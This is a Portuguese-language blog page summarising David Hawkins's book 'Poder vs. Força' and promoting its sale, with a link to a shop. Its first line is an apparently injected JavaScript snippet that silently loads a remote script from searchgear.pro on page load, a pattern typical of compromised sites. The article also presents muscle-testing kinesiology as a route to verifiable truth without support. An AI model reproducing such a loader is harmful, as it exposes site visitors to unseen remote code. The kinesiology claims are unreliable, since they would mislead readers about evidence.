;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); Poder vs Força - O Poder da Simplicidade | David Hawkins Brasil
Categorias
David Hawkins

O Poder de “Poder vs. Força”

Do que o livro “Poder vc Força” trata? Por que ele é tão poderoso e só aumenta a popularidade aqui no Brasil? Esse artigo foi inspirado na obra do Dr. David Hawkins “Poder vc Força”.

O Dilema Humano

Existe uma questão inerente à raça humana que se relaciona à necessidade de buscar respostas e, para isso, uma infinidade de matérias, estudos e análises são desenvolvidas para se obter respostas definitivas, independente de qual seja a questão.

Dados não faltam e cada vez vamos acumulando mais e mais informações. Mas será que tudo isso é suficiente para compreendermos efetivamente as respostas?

O dilema do homem – hoje e sempre – tem sido que ele identifica erroneamente seus próprios artefatos intelectuais como realidade. Mas essas suposições artificiais são meramente produto de um ponto de percepção arbitrário…de um ponto de vista do questionador. Pequenos erros na formulação das perguntas resultam em erros grosseiros nas respostas que seguem.” (Dr. David Hawkins – no livro “Poder vs. Força”)

Segundo Dr.Hawkins, o entendimento de uma situação não deveria ser retirado apenas dos dados, mas também do contexto em que acontecem.

O significado das coisas vem não apenas quando fazemos a pergunta certa, mas quando usamos as ferramentas apropriadas para mensurar as respostas dentro de um contexto que dê significado a elas.

Os Sistemas e Tentativas para compreender o comportamento Humano

Segundo Dr. Hawkins, a filosofia, os sistemas políticos, os sistemas de moralidade, a psicanálise, entre outras ferramentas, são tentativas do homem entender a si mesmo que relativizam a verdade.

Dr. Hawkins pontua que as falhas de todos os sistemas de pensamento derivam da:

  • Falha na diferenciação entre o objetivo e subjetivo
  • Desrespeito à limitação do contexto inerente ao projeto básico e à terminologia
  • Ignorância sobre a própria natureza da consciência
  • Incompreensão a respeito da natureza da causalidade

À medida que novas perspectivas e novas ferramentas são utilizadas para explorar as áreas humanas pode-se observar que essas falhas tornam-se óbvias.

A teoria da tentativa e erro é o que tem feito a humanidade alcançar suas reações quase que cegamente. A busca por resposta resulta em labirintos. A verdadeira resposta às questões humanas vem da simplicidade.

“O universo não desperdiça um único quark, tudo serve a um propósito e se encaixa num equilíbrio – não há eventos estranhos.” (Dr. David Hawkins – no livro “Poder x Força”)

Duas faculdades operacionais, inerentes à raça humana e não confiáveis são responsáveis pelas nossas decisões: razão e sentimento e a história individual e coletiva atestam isso.

A organização lógica dos dados serve principalmente para melhorar um sistema de reconhecimento de padrões que se torna a chamada “verdade”.

Nada é sempre verdade, exceto sob certas circunstâncias e somente a partir de um ponto de vista particular caracteristicamente não declarado.

O principal obstáculo ao desenvolvimento do homem é, portanto, a falta de conhecimento sobre a natureza da própria consciência.

Nossas decisões vêm da reflexão?

Nossa mente age muito mais rápido do que reconhecemos, portanto, a noção de que nossas ações são tomadas por meio de decisões refletidas é uma ilusão. Esse processo é da própria consciência. As decisões advêm de funções da consciência. A mente faz escolhas baseadas em uma infinidade de partes de dados, correlações e projeções que vão além de nossa compreensão consciente. 

A nova ciência da dinâmica não linear chama essa função global dominada pelos padrões de energia de Atratores.

É a consciência que escolhe a melhor opção a todo momento porque essa é sua única função.

O Poder de Poder vs. Força

“Poder vs. Força” é resultado de duas décadas de estudos sobre o uso da calibragem que surge de uma conexão da fisiologia da consciência, da função do sistema nervoso e da física do universo. Somos parte desse universo onde tudo é interconectado. Tudo o que nos parece “segredo” está disponível para nós se soubermos onde e como procurar.

O livro “Poder vs. Força” transforma o simples em óbvio. O simples tem profundidade e precisamos estar abertos a compreendê-lo e assim, expandimos nossa capacidade de compreender a natureza do universo e da vida em si.

Buscar respostas que se conectem com a verdadeira natureza da consciência é o papel da técnica apresentada por Dr. David Hawkins após anos de estudos. A Cinesiologia se baseia em testar uma resposta muscular entre o tudo-ou-nada de um estímulo. Estímulos positivos provoca uma resposta muscular forte e um estímulo negativo provoca uma resposta muscular fraca.

Por sua simplicidade, a técnica pode ser usada por pessoas íntegras, em qualquer lugar, a qualquer momento e será capaz de iniciar uma nova era da experiência humana baseada em uma verdade observável e verificável.

O livro traz todo o embasamento da teoria do Dr. Hawkins e certamente surpreenderá a todos. Compreender a simplicidade de sua teoria nos ajuda a olhar para a vida de maneira mais consciente. 

Esse artigo foi baseado no livro “Poder vs Força” do Dr. David Hawkins e poderá ser adquirido na Loja Pandora através do link: https://loja.pandoratreinamentos.com.br/poder-vs-forca

3 respostas em “O Poder de “Poder vs. Força””

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *